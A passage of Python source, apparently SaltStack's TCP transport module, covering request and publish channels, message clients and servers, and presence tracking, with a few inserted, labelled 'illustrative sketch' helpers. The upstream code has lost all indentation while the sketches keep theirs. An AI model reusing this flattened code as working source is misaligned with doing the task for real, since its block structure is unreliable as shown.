AsyncTCPReqChannel, (self.opts,), loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port the master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
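# --- Illustrative sketch (not part of the upstream module) ---------------
# A minimal example of how a minion-side consumer might drive the publish
# channel defined above: connect, then register an on_recv callback for
# decoded payloads. The ``channel_factory`` argument is a stand-in for
# whatever constructor the surrounding module exposes for this channel
# class; it is an assumption made purely for illustration.
@salt.ext.tornado.gen.coroutine
def _example_pub_channel_usage(channel_factory, opts):
    channel = channel_factory(opts)
    yield channel.connect()

    def _handle(payload):
        # payload has already been decoded by wrap_callback above
        log.debug("received publish payload: %r", payload)

    channel.on_recv(_handle)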
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, the req_server would also be handling this socket; calling
# req_server.stop() after closing the socket here would make tornado raise
# an AssertionError, because it tries to match socket.fileno() (which is -1
# after close) against the fd it holds in its _sockets cache in order to
# remove the socket from the IOLoop handlers
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.write(salt.transport.frame.frame_msg("bad load: id contains a null byte", header=header))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.write(
salt.transport.frame.frame_msg(
"bad load: id {} is not a string".format(id_), header=header
)
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
salt.transport.frame.frame_msg(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
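# --- Illustrative sketch (not part of the upstream module) ---------------
# handle_stream() above reassembles framed messages by feeding arbitrary
# chunks of wire bytes into a streaming msgpack Unpacker and iterating the
# complete frames it yields. The helper below shows that pattern in
# isolation on an in-memory byte string; it is only a demonstration aid.
def _example_reassemble_frames(wire_bytes, chunk_size=7):
    unpacker = salt.utils.msgpack.Unpacker()
    frames = []
    for start in range(0, len(wire_bytes), chunk_size):
        # feed() accepts partial data; iteration only yields complete frames
        unpacker.feed(wire_bytes[start:start + chunk_size])
        for framed_msg in unpacker:
            frames.append(framed_msg)
    return frames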
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
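# --- Illustrative sketch (not part of the upstream module) ---------------
# TCPClientKeepAlive exists so the raw socket can have keep-alive applied
# (via the module's _set_tcp_keepalive helper) before the IOStream is
# created. The function below is a rough, platform-simplified approximation
# of what enabling TCP keep-alive on a socket looks like; it is NOT the
# actual _set_tcp_keepalive implementation.
def _example_enable_keepalive(sock, idle=300, interval=60, count=4):
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    # The per-probe tunables are Linux-specific; guard for other platforms.
    if hasattr(socket, "TCP_KEEPIDLE"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    if hasattr(socket, "TCP_KEEPINTVL"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, interval)
    if hasattr(socket, "TCP_KEEPCNT"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, count)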
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of SaltMessageClient to avoid blocking while waiting to write data to the socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
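# --- Illustrative sketch (not part of the upstream module) ---------------
# SaltMessageClientPool.send() and write_to_stream() both route to the pool
# member with the shortest send_queue. The helper below shows that
# "least-loaded" selection in isolation, using lightweight stand-in objects
# rather than real SaltMessageClient instances.
def _example_pick_least_loaded(clients):
    # clients: any iterable of objects exposing a ``send_queue`` list
    return min(clients, key=lambda c: len(c.send_queue))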
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to %s:%s: %r",
self.host,
self.port,
exc,
)
yield salt.ext.tornado.gen.sleep(1) # TODO: backoff
# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, let's fail this send, and make sure we
# attempt to reconnect
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError("Message timed out")
)
def send(self, msg, timeout=None, callback=None, raw=False):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
future = salt.ext.tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id
)
self.send_timeout_map[message_id] = send_timeout
# if the send queue is empty, spawn the coroutine that does the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
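# --- Illustrative sketch (not part of the upstream module) ---------------
# SaltMessageClient correlates requests and responses with the "mid" header:
# send() stores a Future under a fresh message id, and _stream_return()
# resolves that Future when a frame with the matching header comes back.
# The helper below mimics that bookkeeping with a plain dict so the flow is
# easy to see outside the coroutine machinery.
def _example_correlate_response(pending_futures, framed_msg):
    # pending_futures: dict mapping message id -> Future
    # framed_msg: dict with "head" ({"mid": ...}) and "body" keys
    message_id = framed_msg["head"].get("mid")
    future = pending_futures.pop(message_id, None)
    if future is not None:
        future.set_result(framed_msg["body"])
        return True
    # unknown/untracked ids fall through to the on_recv handler (if any)
    return False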
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri, io_loop=self.io_loop, payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
